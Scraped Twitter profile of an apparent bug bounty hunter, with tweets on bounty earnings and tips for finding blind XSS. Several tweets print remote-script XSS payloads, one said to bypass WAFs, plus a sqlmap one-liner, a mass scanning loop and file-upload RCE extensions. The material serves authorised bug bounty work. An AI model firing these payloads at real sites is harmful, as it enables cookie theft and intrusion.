Vipin Panchal Profile Banner
Vipin Panchal Profile
Vipin Panchal

@dirtycoder0124

Followers
4,330
Following
394
Media
69
Statuses
2,809

A positive, never give up person. Founder of Telegram group

Joined October 2015
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@dirtycoder0124
Vipin Panchal
6 years
7 years job - 0 saving - no job satisfaction - worked for Bosses 1 year(2018) full time bug bounty - Own Boss - full satisfied with my work - bought new car worth $5000 - Saved around $6000 - Better lifestyle than ever Thanks @Bugcrowd and @Hacker0x01
38
128
1K
@dirtycoder0124
Vipin Panchal
3 years
Account takeover notes
Tweet media one
Tweet media two
16
233
672
@dirtycoder0124
Vipin Panchal
11 months
#bugbountytip #bugbounty . Find blind XSS endpoints 1. Visit your email client like Gmail etc. 2. Search for Unsubscribe/feedback/Manage preferences. 3. Click on Unsubscribe and put BXSS payload if they ask for any feedback.
Tweet media one
Tweet media two
10
100
495
@dirtycoder0124
Vipin Panchal
2 years
Blind XSS Tips - Create an Account - Delete/Deactivate Account - If the website asks for feedback, Put your payload. #bugbountytips #BugBounty @Bugcrowd @Hacker0x01
Tweet media one
14
110
484
@dirtycoder0124
Vipin Panchal
3 months
Thrilled to announce I've hit the $100k milestone on @Bugcrowd ! 🚀 A big thank you to the amazing Bugcrowd community and all the program owners for their trust and support. Here's to more successful hunts and continuous learning! 🐞🔍 #BugBounty #CyberSecurity
Tweet media one
36
14
441
@dirtycoder0124
Vipin Panchal
5 years
How to find Blind xss. #blindxss #bxss #DBF tricks.
Tweet media one
4
136
421
@dirtycoder0124
Vipin Panchal
2 years
My google dork webpage is now publicly available for use. @bugbounty_tips @Bugcrowd @Hacker0x01
Tweet media one
16
110
398
@dirtycoder0124
Vipin Panchal
1 year
How do I find forms for Blind XSS attacks? 1. Visit 2. Submit Target domain without " https://" 3. Click Next 4. All 5 dorks are for finding forms. #bugbountytips #bubounty #bugbountytip Sometimes I use a script to find forms in several URLs in one go.
Tweet media one
2
130
368
@dirtycoder0124
Vipin Panchal
7 months
#BugBounty #bugbountytips #bugbountytip #blindxss This script can crawl the website and find URLs that contain HTML Forms. Very useful for me to find Forms for Blind XSS.
Tweet media one
5
80
360
@dirtycoder0124
Vipin Panchal
7 months
#bugbountytips #bugbountytip #blindxss The following script finds HTML forms in the list of URLs. It helps me a lot to find forms for Blind XSS. Use: - python3 endpoints.txt
Tweet media one
4
86
329
@dirtycoder0124
Vipin Panchal
2 months
Just automated the XSS task. Using some open-source tools. - `waybackurls` - `gau` - `anew` - `subfinder` - `httpx` - `gospider` - `hakrawler` - `katana` - `uro` - `gf` - `dalfox` @Bugbountytip @bugbounty @xss
Tweet media one
Tweet media two
1
61
271
@dirtycoder0124
Vipin Panchal
2 years
Got blind XSS on a public program using
Tweet media one
1
17
266
@dirtycoder0124
Vipin Panchal
7 months
#BugBounty I earned $1,125 for my submission on @bugcrowd #ItTakesACrowd Bug: Blind XSS Steps: 1. Found Feedback form 2. Put HTML Inj. payload 3. Payload executed 4. Then put Bxss + Bhtml payload. Bhtml was executed but BXSS did not execute. Cont...
14
34
272
@dirtycoder0124
Vipin Panchal
2 years
Blind XSS -Create account -During the delete account website asked for the feedback -Put Blind xss payload that bypass waf too. Framework used: @bugbounty_tips @Bugcrowd I earned $1,400 for my submission on @bugcrowd #ItTakesACrowd
6
55
256
@dirtycoder0124
Vipin Panchal
5 months
#bugbountytips #BugBounty Amass clean output using oam-tools. 1. Install oam-tools () 2. Use Amass normally(amass enum -d target. com) 3. Use oam to get clean results: oam_subs -names -d target .com
Tweet media one
Tweet media two
0
49
257
@dirtycoder0124
Vipin Panchal
1 year
Bug: Blind XSS Tool used: Vulnerable form : Firstname text field on Request a demo form. Form finder: Shorten the payload: I earned $1,500 for my submission on @bugcrowd #ItTakesACrowd
1
57
230
@dirtycoder0124
Vipin Panchal
2 years
Blind Html injection found using . -Tried Bhtml+Bxss payloads -BXSS payload failed -Only BHTML worked I earned $200 for my submission on @bugcrowd #ItTakesACrowd
Tweet media one
7
26
194
@dirtycoder0124
Vipin Panchal
5 years
I just published Blind Xss (A new way)
0
62
193
@dirtycoder0124
Vipin Panchal
7 months
#bugbountytips #bugbounty #bugbountytip The script automates the following task:
Tweet media one
1
49
187
@dirtycoder0124
Vipin Panchal
10 months
The Top Hacker Methodologies & Tools Notes
Tweet media one
0
50
177
@dirtycoder0124
Vipin Panchal
8 months
#bugbountytips Bug hunters handbook.
Tweet media one
1
46
172
@dirtycoder0124
Vipin Panchal
1 year
-Make a list of wildcard domains and save them as domains.txt -Run this OneLiner on QuickXSS. while read domain; do ./QuickXSS.sh -b -d $domain; done < domains.txt - It will pass every domain to the QuickXSS one by one. Replace my Blindxss URL with Your
Tweet media one
3
59
150
@dirtycoder0124
Vipin Panchal
6 months
#bugbountytip #BugBounty A list of companies that accept responsible disclosure
Tweet media one
1
26
113
@dirtycoder0124
Vipin Panchal
1 year
HTML Injection in mail 1. Signup with HTML payload in FirstName 2. Check mail. 3. No HTML injection found. 4. Go to forgot password and submit it. 5. Check the email. 6. HTML code executed in the mail. The trick worked for me many times. #bugbountytips @Bugcrowd @hackerone
1
37
115
@dirtycoder0124
Vipin Panchal
1 year
Bug: Blind XSS using survey form. Method: First confirm the bug using basic html injection then try simple Blind Xss payload. used to findout the bug. Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder
1
11
102
@dirtycoder0124
Vipin Panchal
4 years
Web app pentesting
Tweet media one
0
36
96
@dirtycoder0124
Vipin Panchal
1 year
I earned $400 for my submission on @bugcrowd Bug: BLIND XSS Tips: Used cookies only payload. Some waf and applications prevent remote js code to take screenshots and other things. Online BXSS tool used: #ItTakesACrowd
6
5
88
@dirtycoder0124
Vipin Panchal
1 year
I earned $525 for my submission on @bugcrowd #ItTakesACrowd using Again I confirmed the vulnerability with the Blind HTML injection and then escalate it to the Blind XSS. Blind XSS on the registration form. #bugbountytip
0
7
77
@dirtycoder0124
Vipin Panchal
2 years
Blind XSS found with the help of and its BHTML payload shortner service. I earned $200 for my submission on @bugcrowd #ItTakesACrowd
0
8
72
@dirtycoder0124
Vipin Panchal
5 years
Thanks @synack @SynackRedTeam for nice welcome kit
Tweet media one
3
2
67
@dirtycoder0124
Vipin Panchal
5 years
xss wasn't working only img tag was working n no other tag. I inserted BHTML payload. Now getting IP address of every visitor. Bug submitted n triaged within 1hr as P3. #xss #DBF
Tweet media one
7
15
66
@dirtycoder0124
Vipin Panchal
1 year
Exercise your XSS Muscles in this XSS Gym! 30+ exercises to test your XSS skills, be you a human or machine!
1
7
67
@dirtycoder0124
Vipin Panchal
5 years
Yay, I was awarded a $250 bounty on @Hacker0x01 ! #TogetherWeHitHarder . IDOR bug. It was possible to delete the profile pic of every user by brute-forcing user_id.
0
4
64
@dirtycoder0124
Vipin Panchal
6 years
My birthday gift from @synack . I passed Technical Assessment on my birthday.
Tweet media one
8
0
62
@dirtycoder0124
Vipin Panchal
8 months
0
22
65
@dirtycoder0124
Vipin Panchal
6 years
New car. Just bcoz of bugcrowd. Thank you @Bugcrowd
Tweet media one
7
2
63
@dirtycoder0124
Vipin Panchal
2 years
Tweet media one
2
11
61
@dirtycoder0124
Vipin Panchal
2 years
Just added some more dorks to find forms. More forms------>More Blind XSSsss. @Bugcrowd @Hacker0x01 @krishnsec @bugbounty_tips @intigriti
Tweet media one
0
5
56
@dirtycoder0124
Vipin Panchal
1 year
You have missed a lot of Blind XSS if your payload contains "xss" keyword or any digit/number Wrong payloads: ------- "><script src=//bxss.com/attack.js> ------- "><script src=//test098.bxss.com/attack.js> @bugbounty_tips @Bugcrowd #blindxss #BugBounty #bugbountytips
2
12
55
@dirtycoder0124
Vipin Panchal
6 years
Reflacted xss. Yay, I was awarded a $350 bounty on @Hacker0x01 ! #TogetherWeHitHarder
2
3
53
@dirtycoder0124
Vipin Panchal
5 years
Invite all bug hunters to check the demo of DBF. It is used to find Bxss flaw. Plz don't pentest the DBF,its in dev stage. Plz Dm the suggestions. Demo account Site: User: test,pass: test @123 $$ @Jhaddix @zseano @gwendallecoguic @Random_Robbie @stokfredrik
3
10
52
@dirtycoder0124
Vipin Panchal
2 years
Some Oneliners for sqli: sqlmap -m urls.txt --batch --risk 3 --random-agent | tee -a report.txt @bugbounty_tips
1
16
52
@dirtycoder0124
Vipin Panchal
8 months
#bugbountytips One-liner subdomain enumeration with a screenshot html report. Tool used: -subfinder -amass -httpx -sort -aquatone OneLiner: (subfinder -d | amass enum -d | sort -u) | httpx -silent | aquatone -out example_report
0
10
50
@dirtycoder0124
Vipin Panchal
6 years
Coming to @nullcon goa 2019. Wish i can meet every bug hunter n learn from them @Bugcrowd @Hacker0x01 @rootxharsh @nagarockshard @0ctac0der @
1
9
40
@dirtycoder0124
Vipin Panchal
5 years
Some people are performing pentesting on . Guys, I request you to please stop it. It is not a bug bounty program and you will not get any bounty for your effort. It's a framework to help you.😄😄😆😆😆😆 #blindxss #DBF
2
3
41
@dirtycoder0124
Vipin Panchal
6 years
Yay, I was awarded a $1,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder
1
0
36
@dirtycoder0124
Vipin Panchal
1 year
Blind XSS (My way): - Stop using disposable mail service. Instead, use any id which can be accessible later. - Subscribe on the target website - Keep an eye on promotional emails and put payloads whenever you get feedback/review or any other form link. #bugbountytips #bugcrowd
1
4
39
@dirtycoder0124
Vipin Panchal
1 year
Tip for Blind XSS: Always try Blind xss payloads on a site where you have discovered reflected xss or stored xss. Because the backend may be developed by the same developer and committed the same mistakes. So go back and check old reports. @Bugcrowd @Hacker0x01 @bugbounty_tips
0
4
33
@dirtycoder0124
Vipin Panchal
1 year
Try these file-uploading extensions accordingly. ASP Applications: .asa -> potential remote code execution .asax -> potential remote code execution .asp -> potential remote code execution .aspx -> potential remote code execution
5
7
34
@dirtycoder0124
Vipin Panchal
10 months
The client's app ID and app secrets are leaked. An attacker can generate the access token too. How to show the impact? Does anyone have any accepted report or reference regarding this? Is it worth to submit or not. #bugbountytip #BugBounty @Jayesh25_ . Thanks in advanced
Tweet media one
5
5
33
@dirtycoder0124
Vipin Panchal
11 months
@BlankJinn Normal payload. But without a closing tag. Sometimes It helps to bypass. "><script src=//blindf.com/bx.php//
0
3
34
@dirtycoder0124
Vipin Panchal
1 year
1
11
33
@dirtycoder0124
Vipin Panchal
5 years
If Bxss does not work: - Try Blind Html injection - Try SSRF (At least you will get Backend ip/url/header info) - I put Bhtml code in b/w my bxss payloads and get notified When Bhtml hits my server and i get that my bxss did not work so try diff payload.
0
5
31
@dirtycoder0124
Vipin Panchal
5 years
12th with PCM BCA a salesman at bajaj showroom for half day Part-time job in PVR cinema Gurgaon for half day XML developer for 3 years MCA developer 0 year Php developer 4 years Ethical Hacker with ......shhhh. for 3 years Now full time Bug hunter.
7
3
30